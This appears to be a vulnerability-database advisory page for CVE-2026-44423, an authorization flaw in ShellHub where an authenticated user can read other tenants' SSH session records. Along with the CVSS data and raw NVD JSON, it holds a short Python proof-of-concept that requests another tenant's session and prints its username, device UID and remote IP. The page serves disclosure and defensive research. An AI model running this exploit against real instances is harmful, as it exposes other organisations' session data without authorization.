CVE-2026-44423

Description

ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/sessions/:uid returns the full session object for any authenticated caller, without scoping by the caller's tenant. An authenticated user can read session records (SSH username, device UID, remote IP, terminal type, authenticated flag, timestamps) belonging to any other namespace. This vulnerability is fixed in 0.24.2.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ShellHub < 0.24.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable ShellHub instance
target_url = "https://<shellhub-domain>/api/sessions/<victim_session_uid>"

# Headers with a valid authentication token from a low-privileged user
headers = {
    "Authorization": "Bearer <attacker_valid_token>",
    "Content-Type": "application/json"
}

# Send the GET request to access another tenant's session
# The application fails to check if the attacker's tenant owns this session_uid
response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    data = response.json()
    print("[+] Exploit successful!")
    print(f"SSH Username: {data.get('username')}")
    print(f"Device UID: {data.get('device_uid')}")
    print(f"Remote IP: {data.get('remote_ip')}")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44423
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44423
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44423/
[4] VulDB https://vuldb.com/cve/CVE-2026-44423
[5] https://github.com/shellhub-io/shellhub/security/advisories/GHSA-9w9c-9w8m-w89q
[6] https://github.com/shellhub-io/shellhub/security/advisories/GHSA-9w9c-9w8m-w89q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44423", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:44.103", "lastModified": "2026-05-14T16:44:55.820", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/sessions/:uid returns the full session object for any authenticated caller, without scoping by the caller's tenant. An authenticated user can read session records (SSH username, device UID, remote IP, terminal type, authenticated flag, timestamps) belonging to any other namespace. This vulnerability is fixed in 0.24.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-9w9c-9w8m-w89q", "source": "[email protected]"}, {"url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-9w9c-9w8m-w89q", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}